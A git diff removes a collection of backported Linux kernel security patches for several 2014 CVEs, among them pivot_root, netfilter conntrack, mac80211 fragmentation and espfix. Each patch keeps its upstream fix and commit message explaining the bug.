-Reviewed-by: Andy Lutomirski
-Link: http://lkml.kernel.org/r/87bnpmihks.fsf@x220.int.ebiederm.org
-Signed-off-by: "Eric W. Biederman"
-Signed-off-by: Andy Lutomirski
-[lizf: Backported to 3.4: adjust context]
-Signed-off-by: Zefan Li
----
- fs/namespace.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/fs/namespace.c b/fs/namespace.c
-index f0f2e06..f7be8d9 100644
---- a/fs/namespace.c
-+++ b/fs/namespace.c
-@@ -2508,6 +2508,9 @@ SYSCALL_DEFINE2(pivot_root, const char __user *, new_root,
- /* make sure we can reach put_old from new_root */
- if (!is_path_reachable(real_mount(old.mnt), old.dentry, &new))
- goto out4;
-+ /* make certain new is below the root */
-+ if (!is_path_reachable(new_mnt, new.dentry, &root))
-+ goto out4;
- br_write_lock(vfsmount_lock);
- detach_mnt(new_mnt, &parent_path);
- detach_mnt(root_mnt, &root_parent);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-7970/^3.17/0003.patch b/Patches/Linux_CVEs/CVE-2014-7970/^3.17/0003.patch
deleted file mode 100644
index 02f15198..00000000
--- a/Patches/Linux_CVEs/CVE-2014-7970/^3.17/0003.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From 0d0826019e529f21c84687521d03f60cd241ca7d Mon Sep 17 00:00:00 2001
-From: "Eric W. Biederman"
-Date: Wed, 8 Oct 2014 10:42:27 -0700
-Subject: mnt: Prevent pivot_root from creating a loop in the mount tree
-
-Andy Lutomirski recently demonstrated that when chroot is used to set
-the root path below the path for the new ``root'' passed to pivot_root
-the pivot_root system call succeeds and leaks mounts.
-
-In examining the code I see that starting with a new root that is
-below the current root in the mount tree will result in a loop in the
-mount tree after the mounts are detached and then reattached to one
-another. Resulting in all kinds of ugliness including a leak of that
-mounts involved in the leak of the mount loop.
-
-Prevent this problem by ensuring that the new mount is reachable from
-the current root of the mount tree.
-
-[Added stable cc. Fixes CVE-2014-7970. --Andy]
-
-Cc: stable@vger.kernel.org
-Reported-by: Andy Lutomirski
-Reviewed-by: Andy Lutomirski
-Link: http://lkml.kernel.org/r/87bnpmihks.fsf@x220.int.ebiederm.org
-Signed-off-by: "Eric W. Biederman"
-Signed-off-by: Andy Lutomirski
----
- fs/namespace.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/fs/namespace.c b/fs/namespace.c
-index ef42d9b..74647c2 100644
---- a/fs/namespace.c
-+++ b/fs/namespace.c
-@@ -2820,6 +2820,9 @@ SYSCALL_DEFINE2(pivot_root, const char __user *, new_root,
- /* make sure we can reach put_old from new_root */
- if (!is_path_reachable(old_mnt, old.dentry, &new))
- goto out4;
-+ /* make certain new is below the root */
-+ if (!is_path_reachable(new_mnt, new.dentry, &root))
-+ goto out4;
- root_mp->m_count++; /* pin it so it won't go away */
- lock_mount_hash();
- detach_mnt(new_mnt, &parent_path);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-8160/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2014-8160/3.2/0001.patch
deleted file mode 100644
index 5c2db680..00000000
--- a/Patches/Linux_CVEs/CVE-2014-8160/3.2/0001.patch
+++ /dev/null
@@ -1,94 +0,0 @@
-From d7cde286daad20dd171247ea47fc5ff4868591f0 Mon Sep 17 00:00:00 2001
-From: Florian Westphal
-Date: Fri, 26 Sep 2014 11:35:42 +0200
-Subject: netfilter: conntrack: disable generic tracking for known protocols
-
-commit db29a9508a9246e77087c5531e45b2c88ec6988b upstream.
-
-Given following iptables ruleset:
-
--P FORWARD DROP
--A FORWARD -m sctp --dport 9 -j ACCEPT
--A FORWARD -p tcp --dport 80 -j ACCEPT
--A FORWARD -p tcp -m conntrack -m state ESTABLISHED,RELATED -j ACCEPT
-
-One would assume that this allows SCTP on port 9 and TCP on port 80.
-Unfortunately, if the SCTP conntrack module is not loaded, this allows
-*all* SCTP communication, to pass though, i.e. -p sctp -j ACCEPT,
-which we think is a security issue.
-
-This is because on the first SCTP packet on port 9, we create a dummy
-"generic l4" conntrack entry without any port information (since
-conntrack doesn't know how to extract this information).
-
-All subsequent packets that are unknown will then be in established
-state since they will fallback to proto_generic and will match the
-'generic' entry.
-
-Our originally proposed version [1] completely disabled generic protocol
-tracking, but Jozsef suggests to not track protocols for which a more
-suitable helper is available, hence we now mitigate the issue for in
-tree known ct protocol helpers only, so that at least NAT and direction
-information will still be preserved for others.
-
- [1] http://www.spinics.net/lists/netfilter-devel/msg33430.html
-
-Joint work with Daniel Borkmann.
-
-Signed-off-by: Florian Westphal
-Signed-off-by: Daniel Borkmann
-Acked-by: Jozsef Kadlecsik
-Signed-off-by: Pablo Neira Ayuso
-[bwh: Backported to 3.2: adjust context]
-Signed-off-by: Ben Hutchings
----
- net/netfilter/nf_conntrack_proto_generic.c | 26 +++++++++++++++++++++++++-
- 1 file changed, 25 insertions(+), 1 deletion(-)
-
-diff --git a/net/netfilter/nf_conntrack_proto_generic.c b/net/netfilter/nf_conntrack_proto_generic.c
-index e2091d0..53bf12a 100644
---- a/net/netfilter/nf_conntrack_proto_generic.c
-+++ b/net/netfilter/nf_conntrack_proto_generic.c
-@@ -14,6 +14,30 @@
-
- static unsigned int nf_ct_generic_timeout __read_mostly = 600*HZ;
-
-+static bool nf_generic_should_process(u8 proto)
-+{
-+ switch (proto) {
-+#ifdef CONFIG_NF_CT_PROTO_SCTP_MODULE
-+ case IPPROTO_SCTP:
-+ return false;
-+#endif
-+#ifdef CONFIG_NF_CT_PROTO_DCCP_MODULE
-+ case IPPROTO_DCCP:
-+ return false;
-+#endif
-+#ifdef CONFIG_NF_CT_PROTO_GRE_MODULE
-+ case IPPROTO_GRE:
-+ return false;
-+#endif
-+#ifdef CONFIG_NF_CT_PROTO_UDPLITE_MODULE
-+ case IPPROTO_UDPLITE:
-+ return false;
-+#endif
-+ default:
-+ return true;
-+ }
-+}
-+
- static bool generic_pkt_to_tuple(const struct sk_buff *skb,
- unsigned int dataoff,
- struct nf_conntrack_tuple *tuple)
-@@ -56,7 +80,7 @@ static int packet(struct nf_conn *ct,
- static bool new(struct nf_conn *ct, const struct sk_buff *skb,
- unsigned int dataoff)
- {
-- return true;
-+ return nf_generic_should_process(nf_ct_protonum(ct));
- }
-
- #ifdef CONFIG_SYSCTL
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-8160/^3.18/0002.patch b/Patches/Linux_CVEs/CVE-2014-8160/^3.18/0002.patch
deleted file mode 100644
index a3d330d7..00000000
--- a/Patches/Linux_CVEs/CVE-2014-8160/^3.18/0002.patch
+++ /dev/null
@@ -1,88 +0,0 @@
-From db29a9508a9246e77087c5531e45b2c88ec6988b Mon Sep 17 00:00:00 2001
-From: Florian Westphal
-Date: Fri, 26 Sep 2014 11:35:42 +0200
-Subject: [PATCH] netfilter: conntrack: disable generic tracking for known
- protocols
-
-Given following iptables ruleset:
-
--P FORWARD DROP
--A FORWARD -m sctp --dport 9 -j ACCEPT
--A FORWARD -p tcp --dport 80 -j ACCEPT
--A FORWARD -p tcp -m conntrack -m state ESTABLISHED,RELATED -j ACCEPT
-
-One would assume that this allows SCTP on port 9 and TCP on port 80.
-Unfortunately, if the SCTP conntrack module is not loaded, this allows
-*all* SCTP communication, to pass though, i.e. -p sctp -j ACCEPT,
-which we think is a security issue.
-
-This is because on the first SCTP packet on port 9, we create a dummy
-"generic l4" conntrack entry without any port information (since
-conntrack doesn't know how to extract this information).
-
-All subsequent packets that are unknown will then be in established
-state since they will fallback to proto_generic and will match the
-'generic' entry.
-
-Our originally proposed version [1] completely disabled generic protocol
-tracking, but Jozsef suggests to not track protocols for which a more
-suitable helper is available, hence we now mitigate the issue for in
-tree known ct protocol helpers only, so that at least NAT and direction
-information will still be preserved for others.
-
- [1] http://www.spinics.net/lists/netfilter-devel/msg33430.html
-
-Joint work with Daniel Borkmann.
-
-Signed-off-by: Florian Westphal
-Signed-off-by: Daniel Borkmann
-Acked-by: Jozsef Kadlecsik
-Signed-off-by: Pablo Neira Ayuso
----
- net/netfilter/nf_conntrack_proto_generic.c | 26 +++++++++++++++++++++++++-
- 1 file changed, 25 insertions(+), 1 deletion(-)
-
-diff --git a/net/netfilter/nf_conntrack_proto_generic.c b/net/netfilter/nf_conntrack_proto_generic.c
-index d25f293776482..957c1db666525 100644
---- a/net/netfilter/nf_conntrack_proto_generic.c
-+++ b/net/netfilter/nf_conntrack_proto_generic.c
-@@ -14,6 +14,30 @@
-
- static unsigned int nf_ct_generic_timeout __read_mostly = 600*HZ;
-
-+static bool nf_generic_should_process(u8 proto)
-+{
-+ switch (proto) {
-+#ifdef CONFIG_NF_CT_PROTO_SCTP_MODULE
-+ case IPPROTO_SCTP:
-+ return false;
-+#endif
-+#ifdef CONFIG_NF_CT_PROTO_DCCP_MODULE
-+ case IPPROTO_DCCP:
-+ return false;
-+#endif
-+#ifdef CONFIG_NF_CT_PROTO_GRE_MODULE
-+ case IPPROTO_GRE:
-+ return false;
-+#endif
-+#ifdef CONFIG_NF_CT_PROTO_UDPLITE_MODULE
-+ case IPPROTO_UDPLITE:
-+ return false;
-+#endif
-+ default:
-+ return true;
-+ }
-+}
-+
- static inline struct nf_generic_net *generic_pernet(struct net *net)
- {
- return &net->ct.nf_ct_proto.generic;
-@@ -67,7 +91,7 @@ static int generic_packet(struct nf_conn *ct,
- static bool generic_new(struct nf_conn *ct, const struct sk_buff *skb,
- unsigned int dataoff, unsigned int *timeouts)
- {
-- return true;
-+ return nf_generic_should_process(nf_ct_protonum(ct));
- }
-
- #if IS_ENABLED(CONFIG_NF_CT_NETLINK_TIMEOUT)
diff --git a/Patches/Linux_CVEs/CVE-2014-8173/3.9-^3.12/0001.patch b/Patches/Linux_CVEs/CVE-2014-8173/3.9-^3.12/0001.patch
deleted file mode 100644
index 07aa158e..00000000
--- a/Patches/Linux_CVEs/CVE-2014-8173/3.9-^3.12/0001.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From ee53664bda169f519ce3c6a22d378f0b946c8178 Mon Sep 17 00:00:00 2001
-From: "Kirill A. Shutemov"
-Date: Fri, 20 Dec 2013 15:10:03 +0200
-Subject: [PATCH] mm: Fix NULL pointer dereference in madvise(MADV_WILLNEED)
- support
-
-Sasha Levin found a NULL pointer dereference that is due to a missing
-page table lock, which in turn is due to the pmd entry in question being
-a transparent huge-table entry.
-
-The code - introduced in commit 1998cc048901 ("mm: make
-madvise(MADV_WILLNEED) support swap file prefetch") - correctly checks
-for this situation using pmd_none_or_trans_huge_or_clear_bad(), but it
-turns out that that function doesn't work correctly.
-
-pmd_none_or_trans_huge_or_clear_bad() expected that pmd_bad() would
-trigger if the transparent hugepage bit was set, but it doesn't do that
-if pmd_numa() is also set. Note that the NUMA bit only gets set on real
-NUMA machines, so people trying to reproduce this on most normal
-development systems would never actually trigger this.
-
-Fix it by removing the very subtle (and subtly incorrect) expectation,
-and instead just checking pmd_trans_huge() explicitly.
-
-Reported-by: Sasha Levin
-Acked-by: Andrea Arcangeli
-[ Additionally remove the now stale test for pmd_trans_huge() inside the
- pmd_bad() case - Linus ]
-Signed-off-by: Linus Torvalds
----
- include/asm-generic/pgtable.h | 5 ++---
- 1 file changed, 2 insertions(+), 3 deletions(-)
-
-diff --git a/include/asm-generic/pgtable.h b/include/asm-generic/pgtable.h
-index b12079afbd5f2..db09234589409 100644
---- a/include/asm-generic/pgtable.h
-+++ b/include/asm-generic/pgtable.h
-@@ -599,11 +599,10 @@ static inline int pmd_none_or_trans_huge_or_clear_bad(pmd_t *pmd)
- #ifdef CONFIG_TRANSPARENT_HUGEPAGE
- barrier();
- #endif
-- if (pmd_none(pmdval))
-+ if (pmd_none(pmdval) || pmd_trans_huge(pmdval))
- return 1;
- if (unlikely(pmd_bad(pmdval))) {
-- if (!pmd_trans_huge(pmdval))
-- pmd_clear_bad(pmd);
-+ pmd_clear_bad(pmd);
- return 1;
- }
- return 0;
diff --git a/Patches/Linux_CVEs/CVE-2014-8709/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-8709/ANY/0001.patch
deleted file mode 100644
index 25f6dfb3..00000000
--- a/Patches/Linux_CVEs/CVE-2014-8709/ANY/0001.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-From 338f977f4eb441e69bb9a46eaa0ac715c931a67f Mon Sep 17 00:00:00 2001
-From: Johannes Berg
-Date: Sat, 1 Feb 2014 00:16:23 +0100
-Subject: mac80211: fix fragmentation code, particularly for encryption
-
-The "new" fragmentation code (since my rewrite almost 5 years ago)
-erroneously sets skb->len rather than using skb_trim() to adjust
-the length of the first fragment after copying out all the others.
-This leaves the skb tail pointer pointing to after where the data
-originally ended, and thus causes the encryption MIC to be written
-at that point, rather than where it belongs: immediately after the
-data.
-
-The impact of this is that if software encryption is done, then
- a) encryption doesn't work for the first fragment, the connection
- becomes unusable as the first fragment will never be properly
- verified at the receiver, the MIC is practically guaranteed to
- be wrong
- b) we leak up to 8 bytes of plaintext (!) of the packet out into
- the air
-
-This is only mitigated by the fact that many devices are capable
-of doing encryption in hardware, in which case this can't happen
-as the tail pointer is irrelevant in that case. Additionally,
-fragmentation is not used very frequently and would normally have
-to be configured manually.
-
-Fix this by using skb_trim() properly.
-
-Cc: stable@vger.kernel.org
-Fixes: 2de8e0d999b8 ("mac80211: rewrite fragmentation")
-Reported-by: Jouni Malinen
-Signed-off-by: Johannes Berg
----
- net/mac80211/tx.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
-index 27c990b..97a02d3 100644
---- a/net/mac80211/tx.c
-+++ b/net/mac80211/tx.c
-@@ -878,7 +878,7 @@ static int ieee80211_fragment(struct ieee80211_tx_data *tx,
- }
-
- /* adjust first fragment's length */
-- skb->len = hdrlen + per_fragm;
-+ skb_trim(skb, hdrlen + per_fragm);
- return 0;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0001.patch
deleted file mode 100644
index 1e7db87b..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0001.patch
+++ /dev/null
@@ -1,16 +0,0 @@
-diff --git a/arch/x86/kernel/entry_32.S b/arch/x86/kernel/entry_32.S
-index 8f3e2de..41baa1f 100644
---- a/arch/x86/kernel/entry_32.S
-+++ b/arch/x86/kernel/entry_32.S
-@@ -554,11 +554,6 @@
-
- CFI_RESTORE_STATE
- ldt_ss:
-- larl PT_OLDSS(%esp), %eax
-- jnz restore_nocheck
-- testl $0x00400000, %eax # returning to 32bit stack?
-- jnz restore_nocheck # allright, normal return
--
- #ifdef CONFIG_PARAVIRT
- /*
- * The kernel can't run on a non-flat stack if paravirt mode
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0001.patch.base64
deleted file mode 100644
index e00288ed..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0002.patch
deleted file mode 100644
index 946704fd..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0002.patch
+++ /dev/null
@@ -1,519 +0,0 @@ -diff --git a/Documentation/x86/x86_64/mm.txt b/Documentation/x86/x86_64/mm.txt -index 881582f..bd43704 100644 ---- a/Documentation/x86/x86_64/mm.txt -+++ b/Documentation/x86/x86_64/mm.txt -@@ -12,6 +12,8 @@ - ffffe90000000000 - ffffe9ffffffffff (=40 bits) hole - ffffea0000000000 - ffffeaffffffffff (=40 bits) virtual memory map (1TB) - ... unused hole ... -+ffffff0000000000 - ffffff7fffffffff (=39 bits) %esp fixup stacks -+... unused hole ... - ffffffff80000000 - ffffffffa0000000 (=512 MB) kernel text mapping, from phys 0 - ffffffffa0000000 - ffffffffff5fffff (=1525 MB) module mapping space - ffffffffff600000 - ffffffffffdfffff (=8 MB) vsyscalls -diff --git a/arch/x86/include/asm/pgtable_64_types.h b/arch/x86/include/asm/pgtable_64_types.h -index 2d88344..b1609f2 100644 ---- a/arch/x86/include/asm/pgtable_64_types.h -+++ b/arch/x86/include/asm/pgtable_64_types.h -@@ -61,6 +61,8 @@ - #define MODULES_VADDR _AC(0xffffffffa0000000, UL) - #define MODULES_END _AC(0xffffffffff000000, UL) - #define MODULES_LEN (MODULES_END - MODULES_VADDR) -+#define ESPFIX_PGD_ENTRY _AC(-2, UL) -+#define ESPFIX_BASE_ADDR (ESPFIX_PGD_ENTRY << PGDIR_SHIFT) - - #define EARLY_DYNAMIC_PAGE_TABLES 64 - -diff --git a/arch/x86/include/asm/setup.h b/arch/x86/include/asm/setup.h -index b7bf350..93797d1 100644 ---- a/arch/x86/include/asm/setup.h -+++ b/arch/x86/include/asm/setup.h -@@ -60,6 +60,9 @@ - static inline void x86_ce4100_early_setup(void) { } - #endif - -+extern void init_espfix_bsp(void); -+extern void init_espfix_ap(void); -+ - #ifndef _SETUP - - /* -diff --git a/arch/x86/kernel/Makefile b/arch/x86/kernel/Makefile -index 7bd3bd3..0fde293 100644 ---- a/arch/x86/kernel/Makefile -+++ b/arch/x86/kernel/Makefile -@@ -27,6 +27,7 @@ - obj-y += syscall_$(BITS).o - obj-$(CONFIG_X86_64) += vsyscall_64.o - obj-$(CONFIG_X86_64) += vsyscall_emu_64.o -+obj-$(CONFIG_X86_64) += espfix_64.o - obj-y += bootflag.o e820.o - obj-y += pci-dma.o quirks.o topology.o kdebugfs.o - obj-y += 
alternative.o i8253.o pci-nommu.o hw_breakpoint.o -diff --git a/arch/x86/kernel/entry_64.S b/arch/x86/kernel/entry_64.S -index 7272089..75ccdc1 100644 ---- a/arch/x86/kernel/entry_64.S -+++ b/arch/x86/kernel/entry_64.S -@@ -58,6 +58,7 @@ - #include - #include - #include -+#include - #include - - /* Avoid __ASSEMBLER__'ifying just for this. */ -@@ -1055,8 +1056,16 @@ - RESTORE_ARGS 1,8,1 - - irq_return: -+ /* -+ * Are we returning to a stack segment from the LDT? Note: in -+ * 64-bit mode SS:RSP on the exception stack is always valid. -+ */ -+ testb $4,(SS-RIP)(%rsp) -+ jnz irq_return_ldt -+ -+irq_return_iret: - INTERRUPT_RETURN -- _ASM_EXTABLE(irq_return, bad_iret) -+ _ASM_EXTABLE(irq_return_iret, bad_iret) - - #ifdef CONFIG_PARAVIRT - ENTRY(native_iret) -@@ -1064,6 +1073,30 @@ - _ASM_EXTABLE(native_iret, bad_iret) - #endif - -+irq_return_ldt: -+ pushq_cfi %rax -+ pushq_cfi %rdi -+ SWAPGS -+ movq PER_CPU_VAR(espfix_waddr),%rdi -+ movq %rax,(0*8)(%rdi) /* RAX */ -+ movq (2*8)(%rsp),%rax /* RIP */ -+ movq %rax,(1*8)(%rdi) -+ movq (3*8)(%rsp),%rax /* CS */ -+ movq %rax,(2*8)(%rdi) -+ movq (4*8)(%rsp),%rax /* RFLAGS */ -+ movq %rax,(3*8)(%rdi) -+ movq (6*8)(%rsp),%rax /* SS */ -+ movq %rax,(5*8)(%rdi) -+ movq (5*8)(%rsp),%rax /* RSP */ -+ movq %rax,(4*8)(%rdi) -+ andl $0xffff0000,%eax -+ popq_cfi %rdi -+ orq PER_CPU_VAR(espfix_stack),%rax -+ SWAPGS -+ movq %rax,%rsp -+ popq_cfi %rax -+ jmp irq_return_iret -+ - .section .fixup,"ax" - bad_iret: - /* -@@ -1127,9 +1160,41 @@ - call preempt_schedule_irq - jmp exit_intr - #endif -- - CFI_ENDPROC - END(common_interrupt) -+ -+ /* -+ * If IRET takes a fault on the espfix stack, then we -+ * end up promoting it to a doublefault. In that case, -+ * modify the stack to make it look like we just entered -+ * the #GP handler from user space, similar to bad_iret. -+ */ -+ ALIGN -+__do_double_fault: -+ XCPT_FRAME 1 RDI+8 -+ movq RSP(%rdi),%rax /* Trap on the espfix stack? 
*/ -+ sarq $PGDIR_SHIFT,%rax -+ cmpl $ESPFIX_PGD_ENTRY,%eax -+ jne do_double_fault /* No, just deliver the fault */ -+ cmpl $__KERNEL_CS,CS(%rdi) -+ jne do_double_fault -+ movq RIP(%rdi),%rax -+ cmpq $irq_return_iret,%rax -+#ifdef CONFIG_PARAVIRT -+ je 1f -+ cmpq $native_iret,%rax -+#endif -+ jne do_double_fault /* This shouldn't happen... */ -+1: -+ movq PER_CPU_VAR(kernel_stack),%rax -+ subq $(6*8-KERNEL_STACK_OFFSET),%rax /* Reset to original stack */ -+ movq %rax,RSP(%rdi) -+ movq $0,(%rax) /* Missing (lost) #GP error code */ -+ movq $general_protection,RIP(%rdi) -+ retq -+ CFI_ENDPROC -+END(__do_double_fault) -+ - /* - * End of kprobes section - */ -@@ -1298,7 +1363,7 @@ - zeroentry bounds do_bounds - zeroentry invalid_op do_invalid_op - zeroentry device_not_available do_device_not_available --paranoiderrorentry double_fault do_double_fault -+paranoiderrorentry double_fault __do_double_fault - zeroentry coprocessor_segment_overrun do_coprocessor_segment_overrun - errorentry invalid_TSS do_invalid_TSS - errorentry segment_not_present do_segment_not_present -@@ -1585,7 +1650,7 @@ - */ - error_kernelspace: - incl %ebx -- leaq irq_return(%rip),%rcx -+ leaq irq_return_iret(%rip),%rcx - cmpq %rcx,RIP+8(%rsp) - je error_swapgs - movl %ecx,%eax /* zero extend */ -diff --git a/arch/x86/kernel/espfix_64.c b/arch/x86/kernel/espfix_64.c -new file mode 100644 -index 0000000..8a64da3 ---- /dev/null -+++ b/arch/x86/kernel/espfix_64.c -@@ -0,0 +1,208 @@ -+/* ----------------------------------------------------------------------- * -+ * -+ * Copyright 2014 Intel Corporation; author: H. Peter Anvin -+ * -+ * This program is free software; you can redistribute it and/or modify it -+ * under the terms and conditions of the GNU General Public License, -+ * version 2, as published by the Free Software Foundation. 
-+ * -+ * This program is distributed in the hope it will be useful, but WITHOUT -+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or -+ * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for -+ * more details. -+ * -+ * ----------------------------------------------------------------------- */ -+ -+/* -+ * The IRET instruction, when returning to a 16-bit segment, only -+ * restores the bottom 16 bits of the user space stack pointer. This -+ * causes some 16-bit software to break, but it also leaks kernel state -+ * to user space. -+ * -+ * This works around this by creating percpu "ministacks", each of which -+ * is mapped 2^16 times 64K apart. When we detect that the return SS is -+ * on the LDT, we copy the IRET frame to the ministack and use the -+ * relevant alias to return to userspace. The ministacks are mapped -+ * readonly, so if the IRET fault we promote #GP to #DF which is an IST -+ * vector and thus has its own stack; we then do the fixup in the #DF -+ * handler. -+ * -+ * This file sets up the ministacks and the related page tables. The -+ * actual ministack invocation is in entry_64.S. -+ */ -+ -+#include -+#include -+#include -+#include -+#include -+#include -+#include -+#include -+#include -+ -+/* -+ * Note: we only need 6*8 = 48 bytes for the espfix stack, but round -+ * it up to a cache line to avoid unnecessary sharing. -+ */ -+#define ESPFIX_STACK_SIZE (8*8UL) -+#define ESPFIX_STACKS_PER_PAGE (PAGE_SIZE/ESPFIX_STACK_SIZE) -+ -+/* There is address space for how many espfix pages? 
*/ -+#define ESPFIX_PAGE_SPACE (1UL << (PGDIR_SHIFT-PAGE_SHIFT-16)) -+ -+#define ESPFIX_MAX_CPUS (ESPFIX_STACKS_PER_PAGE * ESPFIX_PAGE_SPACE) -+#if CONFIG_NR_CPUS > ESPFIX_MAX_CPUS -+# error "Need more than one PGD for the ESPFIX hack" -+#endif -+ -+#define PGALLOC_GFP (GFP_KERNEL | __GFP_NOTRACK | __GFP_REPEAT | __GFP_ZERO) -+ -+/* This contains the *bottom* address of the espfix stack */ -+DEFINE_PER_CPU_READ_MOSTLY(unsigned long, espfix_stack); -+DEFINE_PER_CPU_READ_MOSTLY(unsigned long, espfix_waddr); -+ -+/* Initialization mutex - should this be a spinlock? */ -+static DEFINE_MUTEX(espfix_init_mutex); -+ -+/* Page allocation bitmap - each page serves ESPFIX_STACKS_PER_PAGE CPUs */ -+#define ESPFIX_MAX_PAGES DIV_ROUND_UP(CONFIG_NR_CPUS, ESPFIX_STACKS_PER_PAGE) -+static void *espfix_pages[ESPFIX_MAX_PAGES]; -+ -+static __page_aligned_bss pud_t espfix_pud_page[PTRS_PER_PUD] -+ __aligned(PAGE_SIZE); -+ -+static unsigned int page_random, slot_random; -+ -+/* -+ * This returns the bottom address of the espfix stack for a specific CPU. -+ * The math allows for a non-power-of-two ESPFIX_STACK_SIZE, in which case -+ * we have to account for some amount of padding at the end of each page. 
-+ */ -+static inline unsigned long espfix_base_addr(unsigned int cpu) -+{ -+ unsigned long page, slot; -+ unsigned long addr; -+ -+ page = (cpu / ESPFIX_STACKS_PER_PAGE) ^ page_random; -+ slot = (cpu + slot_random) % ESPFIX_STACKS_PER_PAGE; -+ addr = (page << PAGE_SHIFT) + (slot * ESPFIX_STACK_SIZE); -+ addr = (addr & 0xffffUL) | ((addr & ~0xffffUL) << 16); -+ addr += ESPFIX_BASE_ADDR; -+ return addr; -+} -+ -+#define PTE_STRIDE (65536/PAGE_SIZE) -+#define ESPFIX_PTE_CLONES (PTRS_PER_PTE/PTE_STRIDE) -+#define ESPFIX_PMD_CLONES PTRS_PER_PMD -+#define ESPFIX_PUD_CLONES (65536/(ESPFIX_PTE_CLONES*ESPFIX_PMD_CLONES)) -+ -+#define PGTABLE_PROT ((_KERNPG_TABLE & ~_PAGE_RW) | _PAGE_NX) -+ -+static void init_espfix_random(void) -+{ -+ unsigned long rand; -+ -+ /* -+ * This is run before the entropy pools are initialized, -+ * but this is hopefully better than nothing. -+ */ -+ if (!arch_get_random_long(&rand)) { -+ /* The constant is an arbitrary large prime */ -+ rdtscll(rand); -+ rand *= 0xc345c6b72fd16123UL; -+ } -+ -+ slot_random = rand % ESPFIX_STACKS_PER_PAGE; -+ page_random = (rand / ESPFIX_STACKS_PER_PAGE) -+ & (ESPFIX_PAGE_SPACE - 1); -+} -+ -+void __init init_espfix_bsp(void) -+{ -+ pgd_t *pgd_p; -+ pteval_t ptemask; -+ -+ ptemask = __supported_pte_mask; -+ -+ /* Install the espfix pud into the kernel page directory */ -+ pgd_p = &init_level4_pgt[pgd_index(ESPFIX_BASE_ADDR)]; -+ pgd_populate(&init_mm, pgd_p, (pud_t *)espfix_pud_page); -+ -+ /* Randomize the locations */ -+ init_espfix_random(); -+ -+ /* The rest is the same as for any other processor */ -+ init_espfix_ap(); -+} -+ -+void init_espfix_ap(void) -+{ -+ unsigned int cpu, page; -+ unsigned long addr; -+ pud_t pud, *pud_p; -+ pmd_t pmd, *pmd_p; -+ pte_t pte, *pte_p; -+ int n; -+ void *stack_page; -+ pteval_t ptemask; -+ -+ /* We only have to do this once... 
*/ -+ if (likely(this_cpu_read(espfix_stack))) -+ return; /* Already initialized */ -+ -+ cpu = smp_processor_id(); -+ addr = espfix_base_addr(cpu); -+ page = cpu/ESPFIX_STACKS_PER_PAGE; -+ -+ /* Did another CPU already set this up? */ -+ stack_page = ACCESS_ONCE(espfix_pages[page]); -+ if (likely(stack_page)) -+ goto done; -+ -+ mutex_lock(&espfix_init_mutex); -+ -+ /* Did we race on the lock? */ -+ stack_page = ACCESS_ONCE(espfix_pages[page]); -+ if (stack_page) -+ goto unlock_done; -+ -+ ptemask = __supported_pte_mask; -+ -+ pud_p = &espfix_pud_page[pud_index(addr)]; -+ pud = *pud_p; -+ if (!pud_present(pud)) { -+ pmd_p = (pmd_t *)__get_free_page(PGALLOC_GFP); -+ pud = __pud(__pa(pmd_p) | (PGTABLE_PROT & ptemask)); -+ paravirt_alloc_pud(&init_mm, __pa(pmd_p) >> PAGE_SHIFT); -+ for (n = 0; n < ESPFIX_PUD_CLONES; n++) -+ set_pud(&pud_p[n], pud); -+ } -+ -+ pmd_p = pmd_offset(&pud, addr); -+ pmd = *pmd_p; -+ if (!pmd_present(pmd)) { -+ pte_p = (pte_t *)__get_free_page(PGALLOC_GFP); -+ pmd = __pmd(__pa(pte_p) | (PGTABLE_PROT & ptemask)); -+ paravirt_alloc_pmd(&init_mm, __pa(pte_p) >> PAGE_SHIFT); -+ for (n = 0; n < ESPFIX_PMD_CLONES; n++) -+ set_pmd(&pmd_p[n], pmd); -+ } -+ -+ pte_p = pte_offset_kernel(&pmd, addr); -+ stack_page = (void *)__get_free_page(GFP_KERNEL); -+ pte = __pte(__pa(stack_page) | (__PAGE_KERNEL_RO & ptemask)); -+ paravirt_alloc_pte(&init_mm, __pa(stack_page) >> PAGE_SHIFT); -+ for (n = 0; n < ESPFIX_PTE_CLONES; n++) -+ set_pte(&pte_p[n*PTE_STRIDE], pte); -+ -+ /* Job is done for this CPU and any CPU which shares this page */ -+ ACCESS_ONCE(espfix_pages[page]) = stack_page; -+ -+unlock_done: -+ mutex_unlock(&espfix_init_mutex); -+done: -+ this_cpu_write(espfix_stack, addr); -+ this_cpu_write(espfix_waddr, (unsigned long)stack_page -+ + (addr & ~PAGE_MASK)); -+} -diff --git a/arch/x86/kernel/smpboot.c b/arch/x86/kernel/smpboot.c -index bfd348e..9f009cc 100644 ---- a/arch/x86/kernel/smpboot.c -+++ b/arch/x86/kernel/smpboot.c -@@ -265,6 +265,13 @@ - 
